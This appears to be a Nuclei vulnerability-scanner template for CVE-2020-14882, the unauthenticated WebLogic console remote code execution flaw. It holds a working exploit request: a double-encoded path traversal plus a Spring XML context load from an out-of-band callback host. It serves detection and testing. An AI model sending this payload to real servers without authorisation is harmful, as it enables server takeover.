46 lines
1.6 KiB
YAML
46 lines
1.6 KiB
YAML
id: CVE-2020-14882
|
|
|
|
info:
|
|
name: Oracle WebLogic Server Unauthenticated RCE (and Patch Bypass)
|
|
author: dwisiswant0
|
|
severity: critical
|
|
reference:
|
|
- https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
|
|
- https://twitter.com/jas502n/status/1321416053050667009
|
|
- https://youtu.be/JFVDOIL0YtA
|
|
- https://github.com/jas502n/CVE-2020-14882#eg
|
|
description: |
|
|
Vulnerability in the Oracle WebLogic Server
|
|
product of Oracle Fusion Middleware (component: Console).
|
|
Supported versions that are affected are 10.3.6.0.0,
|
|
12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0.
|
|
Easily exploitable vulnerability allows unauthenticated
|
|
attacker with network access via HTTP to compromise the server.
|
|
Successful attacks of this vulnerability can result in takeover.
|
|
tags: cve,cve2020,oracle,rce,weblogic,oast
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.80
|
|
cve-id: CVE-2020-14882
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=utf-8
|
|
|
|
_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://{{interactsh-url}}")
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "ADMINCONSOLESESSION"
|
|
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http" |